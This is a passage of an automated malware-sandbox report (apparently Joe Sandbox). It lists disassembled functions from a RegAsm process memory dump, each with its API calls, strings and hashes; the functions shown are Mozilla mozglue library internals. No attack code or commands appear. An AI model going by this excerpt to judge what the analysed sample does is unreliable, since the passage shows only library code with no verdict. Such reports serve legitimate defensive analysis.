                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                        • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                        • API String ID: 3790164461-3347204862
                                                                                                                                                        • Opcode ID: aa8fbf04e46d6be6c95ccceae3939bd6f0f38d618bcfc5f0f2d584f484c8f77e
                                                                                                                                                        • Instruction ID: f1add088bc5d01c0d079e61dac75778c67559aef1bb308bbfde47da75cf0b9dd
                                                                                                                                                        • Opcode Fuzzy Hash: aa8fbf04e46d6be6c95ccceae3939bd6f0f38d618bcfc5f0f2d584f484c8f77e
                                                                                                                                                        • Instruction Fuzzy Hash: BBB1D5B0B012099BDB04CF99C591BEEBBB5AF85318F108819D506ABF80D7719944CBED
                                                                                                                                                        Function 6C62C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C62C5A3
                                                                                                                                                        • WideCharToMultiByte.KERNEL32 ref: 6C62C9EA
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C62C9FB
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C62CA12
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C62CA2E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C62CAA5
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                        • String ID: (null)$0
                                                                                                                                                        • API String ID: 4074790623-38302674
                                                                                                                                                        • Opcode ID: 1d149284216b592b6872582f149770803c6f113bd9967e46e7753820d4f9bdda
                                                                                                                                                        • Instruction ID: 5e9383af182bc38c62beb67e7f2a1b837035fab83991b442b3ca87a554a2172f
                                                                                                                                                        • Opcode Fuzzy Hash: 1d149284216b592b6872582f149770803c6f113bd9967e46e7753820d4f9bdda
                                                                                                                                                        • Instruction Fuzzy Hash: 70A1B230609342AFEB10DF29C59475ABBF1AFCA748F04891CE98A97641D739D805CF9A
                                                                                                                                                        Function 6C603480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C603492
                                                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C6034A9
                                                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C6034EF
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C60350E
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C603522
                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C603552
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C60357C
                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C603592
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                        • API String ID: 3634367004-706389432
                                                                                                                                                        • Opcode ID: a22eb6f8f77defaebf7b15f5d8b15ff885018bf16ebf78ec9fc91abe87d9c27d
                                                                                                                                                        • Instruction ID: 41a022ab29f1c4976638b111ceda6835c916419b183b69c0d85fb749746c02c6
                                                                                                                                                        • Opcode Fuzzy Hash: a22eb6f8f77defaebf7b15f5d8b15ff885018bf16ebf78ec9fc91abe87d9c27d
                                                                                                                                                        • Instruction Fuzzy Hash: 1D31D370B02206ABDF04DFBAC988EAA73B9FB87305F100129E505E3660DB749945CF79
                                                                                                                                                        Function 6C604480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3009372454-0
                                                                                                                                                        • Opcode ID: 71df5c81778bd44e53e03af29892714acf617b869891f3a7c57cbfbacc0225de
                                                                                                                                                        • Instruction ID: 500bd249e689d60bddc76badd6a5b12315a3ea15963eb348945eb1552c508378
                                                                                                                                                        • Opcode Fuzzy Hash: 71df5c81778bd44e53e03af29892714acf617b869891f3a7c57cbfbacc0225de
                                                                                                                                                        • Instruction Fuzzy Hash: DCB1E671B001108FDB2C9E3CCAD07BD77A1AF52318F184669E416EBB96E7B1D8408B49
                                                                                                                                                        Function 6C66AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1192971331-0
                                                                                                                                                        • Opcode ID: 0efe3aac6c45e8b541dc580a827eca7bd0356d83c7bbc277aa88d3598d158abf
                                                                                                                                                        • Instruction ID: 8a19a606a0e6db0ac5353be68406fa557229aa0114670ee407832b4203238d88
                                                                                                                                                        • Opcode Fuzzy Hash: 0efe3aac6c45e8b541dc580a827eca7bd0356d83c7bbc277aa88d3598d158abf
                                                                                                                                                        • Instruction Fuzzy Hash: 483184B19057059FDB00AF7AC98825EBBF0FF86345F01492DE98587611EB709449CBA6
                                                                                                                                                        Function 6C619620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C619675
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C619697
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6196E8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C619707
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61971F
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619773
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6197B7
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197D0
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6C6197EB
                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C619824
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                        • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 409848716-3880535382
                                                                                                                                                        • Opcode ID: a0090f3f9d775b9de26193bd776a7067bc75aef565015ee972d68e274360a184
                                                                                                                                                        • Instruction ID: f7f4924b8dc620d9f93d11065c1049a34c0ccf599ab07129e3bca114b22a3de1
                                                                                                                                                        • Opcode Fuzzy Hash: a0090f3f9d775b9de26193bd776a7067bc75aef565015ee972d68e274360a184
                                                                                                                                                        • Instruction Fuzzy Hash: 93418274602205AFEF00CFAAE8D4A9677B4FB4B359F104528ED1597B40D730A855CFBA
                                                                                                                                                        Function 6C613E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 6C613EEE
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C613FDC
                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,00000000,00000040), ref: 6C614006
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C6140A1
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C6140AF
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C6140C2
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C614134
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C614143
                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,?,?,?,?,6C613CCC), ref: 6C614157
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3680524765-0
                                                                                                                                                        • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                        • Instruction ID: ee1e0459381259b07479f40faeab224bf173c7f087f022be3fc84514aba03fda
                                                                                                                                                        • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                        • Instruction Fuzzy Hash: C2A1AFB1A04205CFDB50CF29C880769B7B5FF48319F2545A9D909AFB42D771E886CBA4
                                                                                                                                                        Function 6C659D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C658273), ref: 6C659D65
                                                                                                                                                        • free.MOZGLUE(6C658273,?), ref: 6C659D7C
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6C659D92
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C659E0F
                                                                                                                                                        • free.MOZGLUE(6C65946B,?,?), ref: 6C659E24
                                                                                                                                                        • free.MOZGLUE(?,?,?), ref: 6C659E3A
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C659EC8
                                                                                                                                                        • free.MOZGLUE(6C65946B,?,?,?), ref: 6C659EDF
                                                                                                                                                        • free.MOZGLUE(?,?,?,?), ref: 6C659EF5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                        • Opcode ID: 8c1444cbc66847dd3a46514f06a750805755e9b6ccb447a086fb4ea98eae1511
                                                                                                                                                        • Instruction ID: b565e569548134dc913be96524c5110455d3415ef1df0dcab2eb921f50b83bdf
                                                                                                                                                        • Opcode Fuzzy Hash: 8c1444cbc66847dd3a46514f06a750805755e9b6ccb447a086fb4ea98eae1511
                                                                                                                                                        • Instruction Fuzzy Hash: B87191B0909B419BD712CF18C4405ABF3F4FF99319B94961DE89A5B711EB30E886CF89
                                                                                                                                                        Function 6C65DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C65DDCF
                                                                                                                                                          • Part of subcall function 6C63FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C63FA4B
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C6590FF
                                                                                                                                                          • Part of subcall function 6C6590E0: free.MOZGLUE(?,00000000,?,?,6C65DEDB), ref: 6C659108
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DE0D
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C65DE41
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DE5F
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DEA3
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C65DEE9
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C64DEFD,?,6C614A68), ref: 6C65DF32
                                                                                                                                                          • Part of subcall function 6C65DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C65DB86
                                                                                                                                                          • Part of subcall function 6C65DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C65DC0E
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C64DEFD,?,6C614A68), ref: 6C65DF65
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C65DF80
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 112305417-0
                                                                                                                                                        • Opcode ID: 608fd2860faf0e6dfd33454cc6347d49b6f9034cd755047914b2a534d7740c64
                                                                                                                                                        • Instruction ID: 5eae35c67ec0c06f8a14a302732982cbd8f48297f0c043c9fe9daa2ef1a66d81
                                                                                                                                                        • Opcode Fuzzy Hash: 608fd2860faf0e6dfd33454cc6347d49b6f9034cd755047914b2a534d7740c64
                                                                                                                                                        • Instruction Fuzzy Hash: 2B51C872701601ABD7219B18D9806EE7372BF9234CFE5051CD45A63B80D732F82ACB9E
                                                                                                                                                        Function 6C665D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D32
                                                                                                                                                        • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D62
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D6D
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665D84
                                                                                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665DA4
                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665DC9
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C665DDB
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665E00
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C665C8C,?,6C63E829), ref: 6C665E45
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2325513730-0
                                                                                                                                                        • Opcode ID: b74aaa8c734b55c7d5404f3103cbd5e9abf11233c547944e319308cb448ca608
                                                                                                                                                        • Instruction ID: 1562082fe59e981f4790ae032731883f9af57b1c6ffe61f87cce3e70b28a6b65
                                                                                                                                                        • Opcode Fuzzy Hash: b74aaa8c734b55c7d5404f3103cbd5e9abf11233c547944e319308cb448ca608
                                                                                                                                                        • Instruction Fuzzy Hash: B4416F74701205AFCB10DF66C8D9AAE77F5EF8A314F544068D50A9BB92DB30AC05CB6A
                                                                                                                                                        Function 6C63CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6031A7), ref: 6C63CDDD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 4275171209-2186867486
                                                                                                                                                        • Opcode ID: 895eb02413662be35f49b9501fce3057330c079c710e2448a9e4794ec175abaf
                                                                                                                                                        • Instruction ID: 95dd92e7274460426197c3e10973f70fd6c98598eab527528e084f1f7568bde3
                                                                                                                                                        • Opcode Fuzzy Hash: 895eb02413662be35f49b9501fce3057330c079c710e2448a9e4794ec175abaf
                                                                                                                                                        • Instruction Fuzzy Hash: 3731E7307412357BEF00AEA68C45BAE3775AF81708F206118F61AAB6C0DB70D401CBAD
                                                                                                                                                        Function 6C60ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6C60F100: LoadLibraryW.KERNEL32(shell32,?,6C67D020), ref: 6C60F122
                                                                                                                                                          • Part of subcall function 6C60F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C60F132
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000012), ref: 6C60ED50
                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C60EDAC
                                                                                                                                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C60EDCC
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C60EE08
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C60EE27
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C60EE32
                                                                                                                                                          • Part of subcall function 6C60EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C60EBB5
                                                                                                                                                          • Part of subcall function 6C60EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C63D7F3), ref: 6C60EBC3
                                                                                                                                                          • Part of subcall function 6C60EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C63D7F3), ref: 6C60EBD6
                                                                                                                                                        Strings
                                                                                                                                                        • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C60EDC1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
